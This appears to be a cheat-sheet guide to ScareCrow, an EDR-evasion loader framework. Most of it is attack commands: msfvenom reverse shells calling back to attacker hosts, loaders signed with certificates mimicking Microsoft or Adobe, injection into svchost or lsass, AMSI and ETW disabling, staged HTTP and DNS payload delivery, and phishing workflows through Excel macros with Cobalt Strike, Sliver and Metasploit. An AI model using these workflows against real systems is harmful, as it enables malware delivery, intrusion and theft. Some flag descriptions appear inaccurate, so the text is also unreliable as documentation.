ScareCrow
ScareCrow is a powerful payload creation framework designed to generate EDR-evasive loaders that bypass detection through code signing, process injection, and advanced execution techniques. Built by Optiv, it supports multiple delivery mechanisms and loader types for flexible red team operations.
Installation
Prerequisites
# Install required dependencies (Debian/Ubuntu)
sudo apt-get install mingw-w64 osslsigncode openssl golang-go
# On macOS
brew install mingw-w64 osslsigncode openssl go
# On CentOS/RHEL
sudo yum install mingw-w64-gcc mingw-w64-gcc-c++ openssl golangBuild from Source
# Clone ScareCrow repository
git clone https://github.com/optiv/ScareCrow.git
cd ScareCrow
# Build the binary (requires Go 1.16+)
go build -o ScareCrow main.go
# Verify installation
./ScareCrow -hQuick Install via Go
# Install directly to $GOPATH/bin
go install github.com/optiv/ScareCrow@latest
# Add to PATH if needed
export PATH=$PATH:$(go env GOPATH)/binQuick Start
Generate a basic loader from msfvenom shellcode:
# Generate shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f raw > payload.bin
# Create signed loader
./ScareCrow -I payload.bin -domain microsoft.com -delivery http
# Output files created:
# - loader.exe (main loader)
# - loader.exe.sig (signature)
# - loader.c (C source code)Loader Types
| Type | Flag | Description | Best For |
|---|---|---|---|
| Binary | -Loader binary | Standalone executable | Direct execution, reverse shells |
| DLL | -Loader dll | Dynamic library for sideloading | DLL injection, process hollowing |
| COM Object | -Loader control | COM control object (.scr) | Screensaver execution, UAC bypass |
| Excel Macro | -Loader excel | Excel-based delivery | Phishing documents, macro execution |
| MSIExec | -Loader msiexec | Windows Installer wrapper | Code execution via MSI, UAC bypass |
| WScript | -Loader wscript | Windows Script Host wrapper | VBScript/JScript execution, LOLBin abuse |
DLL Side-Loading Example
# Create DLL for side-loading
./ScareCrow -I payload.bin -Loader dll -domain adobe.com -delivery http
# Use legitimate application to load malicious DLL
# Place loader.dll next to legitimate application
# When legitimate app runs, it loads our malicious DLLExcel Macro Delivery
# Generate Excel-compatible loader
./ScareCrow -I payload.bin -Loader excel -domain microsoft.com
# Creates VBA macro that executes loader
# Can be embedded in .xls/.xlsm documentsInput Formats
Raw Shellcode Input
# Using -I flag for raw binary shellcode
./ScareCrow -I payload.bin -domain company.com
# Generate from various shellcode sources
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=443 -f raw > payload.bin
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=8080 -f raw > shell.binMetasploit Integration
# Generate shellcode directly from msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=attacker.com LPORT=4444 \
-f raw | ./ScareCrow -I /dev/stdin -domain microsoft.com
# For 32-bit payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=target.com LPORT=4444 \
-f raw > x86.bin && ./ScareCrow -I x86.binCobalt Strike Shellcode
# Export from Cobalt Strike beacon
# Generate raw shellcode from beacon export
./ScareCrow -I beacon.bin -domain cloud.microsoft.com -delivery httpCode Signing
Domain-Based Certificate Cloning
# Sign with cloned certificate from domain
./ScareCrow -I payload.bin -domain microsoft.com -valid 365
# ScareCrow clones legitimate certificate from specified domain
# Creates trusted signature that bypasses SmartScreen
# Alternative domains for cloning:
# microsoft.com, apple.com, adobe.com, google.com, github.comCertificate Options
# Sign without specific domain (self-signed)
./ScareCrow -I payload.bin
# Specify validity period (days)
./ScareCrow -I payload.bin -domain adobe.com -valid 90
# Use custom certificate (if available)
./ScareCrow -I payload.bin -domain company.comWhy Code Signing Matters
Signed loaders bypass numerous defenses:
- SmartScreen warning suppression
- Code signature validation in EDRs
- Windows Defender Application Guard bypass
- Trust indicators in file properties
Encryption
Encryption Modes
# AES-256 encryption (default, recommended)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode AES
# ELZMA compression + encryption (smaller file size)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode ELZMA
# XOR encryption (fastest, less secure)
./ScareCrow -I payload.bin -encryptionmode XORFile Size Comparison
# AES: ~180KB (best compatibility)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode AES
# ELZMA: ~120KB (compressed)
./ScareCrow -I payload.bin -domain microsoft.com -encryptionmode ELZMA
# XOR: ~140KB (fast)
./ScareCrow -I payload.bin -encryptionmode XORProcess Injection
Injection Techniques
# Self-injection (no parent process)
./ScareCrow -I payload.bin -injection self -domain microsoft.com
# Parent process injection (masquerade as another process)
./ScareCrow -I payload.bin -injection process -process svchost.exe
# Target specific process for injection
./ScareCrow -I payload.bin -injection process -process notepad.exeProcess Injection Tactics
# Inject into legitimate system processes
./ScareCrow -I payload.bin -injection process -process svchost.exe -domain microsoft.com
./ScareCrow -I payload.bin -injection process -process taskhostw.exe -domain adobe.com
./ScareCrow -I payload.bin -injection process -process explorer.exe -domain apple.com
# Self-injection for standalone execution
./ScareCrow -I payload.bin -injection self -domain microsoft.comProcess Selection Tips
svchost.exe- System service host (trusted)taskhostw.exe- Task Scheduler host (legitimate)explorer.exe- Windows Explorer (common)winlogon.exe- Logon process (high privilege)lsass.exe- Local Security Authority (protected)
Delivery Options
HTTP Delivery
# Remote URL retrieval
./ScareCrow -I payload.bin -delivery http -url http://attacker.com/loader.exe \
-domain microsoft.com
# Staged delivery - loader downloads payload from URL
./ScareCrow -I payload.bin -delivery httpDNS Delivery
# DNS-based payload retrieval
./ScareCrow -I payload.bin -delivery dns -domain attacker.com
# Useful in restricted networks where HTTP is blocked
# Requires DNS exfiltration/command infrastructureURL-Based Delivery
# Specify custom delivery URL
./ScareCrow -I payload.bin -url http://internal.corp/updates/loader.exe \
-delivery http -domain microsoft.com
# File will be downloaded from specified URL at runtimeNo Internet Delivery
# Embed payload directly (no remote retrieval)
./ScareCrow -I payload.bin -domain microsoft.com
# Useful for offline or isolated environmentsEDR Evasion Techniques
ETW (Event Tracing for Windows) Patching
# Disable ETW logging
./ScareCrow -I payload.bin -domain microsoft.com -noetw
# Prevents Event Tracing for Windows from logging execution
# Avoids triggering ETW-based detection rulesAMSI Bypass
# Bypass AMSI (Antimalware Scan Interface)
./ScareCrow -I payload.bin -domain microsoft.com -noamsi
# Allows shellcode execution without AMSI scanning
# Particularly effective for PowerShell/VBS payloadsSleep Obfuscation
# Obfuscate Sleep calls to evade timeout detection
./ScareCrow -I payload.bin -domain microsoft.com -nosleep
# Sleep API is hooked by many EDRs
# Obfuscation prevents detection of sleep patternsCombined Evasion
# Maximum evasion configuration
./ScareCrow -I payload.bin -domain microsoft.com \
-noetw -noamsi -nosleep -encryptionmode AES
# Combines multiple evasion techniques
# Most effective against modern EDR solutionsAdditional Evasion
- Direct syscall execution (bypasses hooked APIs)
- Unhooking kernel32 functions
- Hardware breakpoint detection bypass
- Sandbox evasion checks
- Timing-based detection avoidance
Advanced Options
Custom Passwords
# Use custom encryption password
./ScareCrow -I payload.bin -password "SecurePass123!" -domain microsoft.com
# Password-protects the generated loaderConsole Output Control
# Show console window during execution
./ScareCrow -I payload.bin -console -domain microsoft.com
# Hide console (default for stealthy execution)
./ScareCrow -I payload.bin -domain microsoft.comSandbox Evasion
# Enable sandbox evasion checks
./ScareCrow -I payload.bin -domain microsoft.com
# Detects and avoids common sandbox environments
# Checks for: VirtualBox, VMware, Hyper-V, QEMUFile Output Control
# Specify custom output filename
./ScareCrow -I payload.bin -out custom_loader.exe -domain microsoft.com
# Change output directory
./ScareCrow -I payload.bin -o /tmp/output/ -domain microsoft.comComplete Workflow Examples
Cobalt Strike Integration
# 1. Generate Cobalt Strike shellcode
# Export beacon -> generate shellcode -> save as cs.bin
# 2. Create ScareCrow loader
./ScareCrow -I cs.bin -domain microsoft.com -delivery http \
-injection process -process svchost.exe -noetw -noamsi
# 3. Host on web server
# Place loader.exe on HTTP server
# 4. Deliver via social engineering
# Email, USB, shared drive, etc.Sliver Integration
# 1. Generate Sliver implant shellcode
sliver > generate --mtls localhost --format shellcode > sliver.bin
# 2. Create loader
./ScareCrow -I sliver.bin -domain apple.com -encryptionmode ELZMA \
-injection self -noetw
# 3. Execute on target
# ./loader.exe (connects back to Sliver server)Metasploit Multi-Stage
# 1. Generate msfvenom shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.10 \
LPORT=4444 -f raw > msfvenom.bin
# 2. Create signed loader
./ScareCrow -I msfvenom.bin -domain adobe.com -delivery http \
-injection process -process explorer.exe -nosleep
# 3. Set up Metasploit listener
# use exploit/multi/handler
# set LHOST 10.10.10.10
# set LPORT 4444
# exploitExcel-Based Phishing
# 1. Generate payload
./ScareCrow -I payload.bin -Loader excel -domain microsoft.com
# 2. Create Excel document
# Insert generated macro into Excel
# 3. Social engineer target
# Send as email attachment, mention "Enable Macros"Troubleshooting
Build Errors
# Missing Go installation
# Solution: Install Go 1.16+ from golang.org
# Cannot find mingw-w64
# Solution: apt-get install mingw-w64
# openssl not found
# Solution: apt-get install opensslCompilation Failures
# "Invalid argument" error
# Solution: Check shellcode validity - ensure raw binary format
# "Certificate error" when signing
# Solution: Verify domain is reachable, has valid certificate
# File generation issues
# Solution: Check write permissions in current directoryPayload Execution Issues
# Loader doesn't execute
# Solution: Verify shellcode format, try different injection method
# EDR blocking execution
# Solution: Enable -noetw -noamsi -nosleep flags
# Process injection fails
# Solution: Ensure target process exists, use -injection self as fallbackSize Issues
# Loader too large (> 10MB)
# Solution: Use -encryptionmode ELZMA to compress
# Output binary still detected
# Solution: Recombine with fresh domain signing, change encryption modeBest Practices
Operational Security
- Always use code signing with legitimate-looking domains
- Rotate domains between campaigns
- Test payloads in isolated lab environment first
- Monitor for detection patterns on target systems
- Use staged delivery when network allows
Evasion Strategy
- Combine multiple evasion techniques (-noetw, -noamsi, -nosleep)
- Vary loader types between targets
- Use process injection into trusted system processes
- Implement sleep obfuscation for long-running operations
- Test against target’s specific EDR solution
Payload Selection
- Match shellcode size to target constraints
- Use x64 when possible (64-bit Windows is default)
- Consider network bandwidth for large payloads
- Test callback connectivity before deployment
- Plan for multiple payload attempts
Post-Exploitation
- Monitor injected process for suspicious behavior
- Use encrypted communications for C2
- Implement proper logging and audit trails
- Clean up artifacts after operation completion
- Document all activities for IR purposes
Related Tools
| Tool | Purpose | Use Case |
|---|---|---|
| Donut | Shellcode generation from .NET | .NET assembly execution |
| PEzor | PE obfuscation and evasion | Binary obfuscation |
| Freeze | Anti-debug and anti-analysis | Detection evasion |
| NimCrypt2 | Nim-based encryption | Alternative language approach |
| shhhloader | Shellcode loader framework | Custom loader development |
| Sliver | C2 framework alternative | Command and control |
| Cobalt Strike | Commercial C2 framework | Full-featured red team operations |
Complementary Techniques
- Use with Atomics Red Team for evasion testing
- Combine with LOLBAS for execution
- Integrate with Covenant C2 framework
- Pair with Mimikatz for credential theft
- Deploy alongside Empire/PowerEmpire